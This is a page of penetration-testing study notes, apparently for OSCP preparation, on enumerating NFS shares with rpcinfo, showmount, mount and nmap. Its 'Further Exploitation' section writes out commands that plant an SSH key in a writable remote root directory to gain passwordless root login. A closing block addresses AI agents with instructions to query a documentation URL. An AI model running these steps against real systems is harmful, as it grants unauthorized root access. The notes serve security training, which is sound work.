# NFS Enumeration (Port 111, 2049) ## Quick Intro * Developed in 1984 by Sun Microsystem and similar to SMB because it allows access to files over a network. * Common ports used by NFS are **port 111 and 2049 tcp/udp** * It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory. ## Identifying if NFS is in use ``` rpcinfo -p # If you get 111 and 2049 listed , shares are enable and we can mount them ``` ## Show all mounts * if nfs is available, use **showmount** to view available mounting points ``` showmount -e $ip ``` ## Mount a NFS share * you can then mount the file system with the **mount** command and interact with remote system * first create the directory for mounting - `mkdir /mnt/nfs` ``` mount -t nfs $ip:/share /mnt/nfs ``` ## Unmounting the shares ``` umount -f -l /mnt/nfs # -f – Force unmount (in case of an unreachable NFS system). (Requires kernel 2.1.116 or later.) # -l – Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and cleanup all references to the filesystem as soon as it is not busy anymore. (Requires kernel 2.4.11 or later.) ``` ## Permission Denied ? {% embed url="" %} ## Further Exploitation * **If you can write to the remote hosts, try to put ssh key there** so that we can get remote ssh without password , ``` ssh keygen # Generating ssh keys cat ~/.ssh/id_rsa.pub >> /mnt/nfs/root/.ssh/authorized_keys # Putting it to remote host ssh root@$ip # Now can login without password on target ``` ## Nmap Scan on RPCbind and NFS ``` nmap -v -p 111 10.11.1.1-254 nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254 nmap -p 111 --script nfs* 10.11.1.72 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gabb4r.gitbook.io/oscp-notes/service-enumeration/nfs-enumeration-port-111-2049.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.